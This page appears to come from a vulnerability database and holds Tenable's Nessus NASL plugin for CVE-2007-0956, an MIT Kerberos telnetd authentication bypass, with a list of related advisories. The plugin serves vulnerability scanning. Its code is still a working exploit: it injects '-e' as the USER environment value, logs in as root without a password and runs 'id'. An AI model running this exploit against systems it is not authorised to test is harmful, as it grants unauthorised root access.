Kerberos telnet authentication bypass via crafted usernam
Reporter | Title | Published | Views | Family All 67 |
---|---|---|---|---|
d2 | DSquare Exploit Pack: D2SEC_KRB5_TELNETD | 6 Apr 200701:19 | – | d2 |
Tenable Nessus | Solaris 9 (sparc) : 116462-06 | 6 Nov 200600:00 | – | nessus |
Tenable Nessus | Solaris 5.9 (x86) : 119796-04 | 6 Nov 200600:00 | – | nessus |
Tenable Nessus | SuSE 10 Security Update : krb5-apps-servers (ZYPP Patch Number 3022) | 13 Dec 200700:00 | – | nessus |
Tenable Nessus | Solaris 5.9 (sparc) : 119796-04 | 23 Apr 200900:00 | – | nessus |
Tenable Nessus | openSUSE 10 Security Update : krb5-apps-servers (krb5-apps-servers-3021) | 17 Oct 200700:00 | – | nessus |
Tenable Nessus | Mandrake Linux Security Advisory : krb5 (MDKSA-2007:077-1) | 5 Apr 200700:00 | – | nessus |
Tenable Nessus | GLSA-200704-02 : MIT Kerberos 5: Arbitrary remote code execution | 5 Apr 200700:00 | – | nessus |
Tenable Nessus | CentOS 3 / 4 : krb5 (CESA-2007:0095) | 5 Apr 200700:00 | – | nessus |
Tenable Nessus | RHEL 2.1 / 3 / 4 / 5 : krb5 (RHSA-2007:0095) | 5 Apr 200700:00 | – | nessus |
Source | Link |
---|---|
cve | www.cve.mitre.org/cgi-bin/cvename.cgi |
nessus | www.nessus.org/u |
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
# Need Nessus 2.2.9 or newer
if (NASL_LEVEL < 2204 ) exit(0);
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(24998);
script_version("1.29");
script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");
script_cve_id("CVE-2007-0956");
script_bugtraq_id(23281);
script_xref(name:"CERT", value:"220816");
script_name(english:"Kerberos telnet Crafted Username Remote Authentication Bypass");
script_set_attribute(attribute:"synopsis", value:
"It is possible to log into the remote host using telnet without
supplying any credentials.");
script_set_attribute(attribute:"description", value:
"An authentication bypass vulnerability exists in the MIT krb5 telnet
daemon due to a failure to sanitize malformed usernames. This allows
usernames beginning with '-e' to be interpreted as a command-line flag
by the login.krb5 program. A remote attacker can exploit this, via a
crafted username, to cause login.krb5 to execute part of the BSD
rlogin protocol, which in turn allows the attacker to login with an
arbitrary username without a password or any further authentication.");
# http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2007-001-telnetd.txt
script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?0ed21002");
script_set_attribute(attribute:"solution", value:
"Apply the fixes described in MIT krb5 Security Advisory 2007-001, or
contact your vendor for a patch.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C");
script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H");
script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"exploited_by_nessus", value:"true");
script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
script_set_attribute(attribute:"canvas_package", value:"D2ExploitPack");
script_set_attribute(attribute:"vuln_publication_date", value:"2007/04/03");
script_set_attribute(attribute:"plugin_publication_date", value:"2007/04/05");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:mit:kerberos");
script_set_attribute(attribute:"thorough_tests", value:"true");
script_end_attributes();
script_category(ACT_ATTACK);
script_family(english:"Gain a shell remotely");
script_copyright(english:"This script is Copyright (C) 2007-2022 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_dependencies("find_service1.nasl");
script_exclude_keys("global_settings/supplied_logins_only");
script_require_ports("Services/telnet", 23);
exit(0);
}
include ("global_settings.inc");
include ("audit.inc");
include ("byte_func.inc");
include ("telnet2_func.inc");
include("data_protection.inc");
if (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);
port = get_kb_item("Services/telnet");
if (!port) port = 23;
global_var rcvdata, idsent, idstate;
function local_telnet_callback ()
{
local_var data;
data = _FCT_ANON_ARGS[0];
if (data && ord(data[0]) != 0x00 && ord(data[0]) != 0x0d)
rcvdata += data[0];
if ( (idstate == 0 && (egrep(pattern:"login:", string:rcvdata, icase:TRUE))) ||
egrep(pattern:"(password|usage):", string:rcvdata, icase:TRUE) )
{
exit(0);
}
if (idstate == 0)
{
telnet_write('plop\r\0');
telnet_write('\0\r\0');
rcvdata = NULL;
idstate = 1;
}
if (idstate == 1 && "login: login:" >< rcvdata)
{
rcvdata = NULL;
telnet_write('root\r\0');
telnet_write('id\r\0');
idstate = 2;
}
if (idstate == 2 && "uid=" >< rcvdata)
{
security_hole(port:port, extra:'It was possible to log in and execute "id" : \n\n' + data_protection::sanitize_uid(output:egrep(pattern:"uid=", string:rcvdata)));
telnet_write('exit\r\0');
exit(0);
}
}
rcvdata = NULL;
idstate = 0;
env_data =
mkbyte(0) +
mkbyte(0) + "USER" +
mkbyte(1) + "-e";
options = NULL;
options[0] = make_list(OPT_NEW_ENV, env_data);
if (!telnet2_init(options:options, timeout:10))
exit(0);
telnet_loop(telnet_callback_fn:@local_telnet_callback);
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo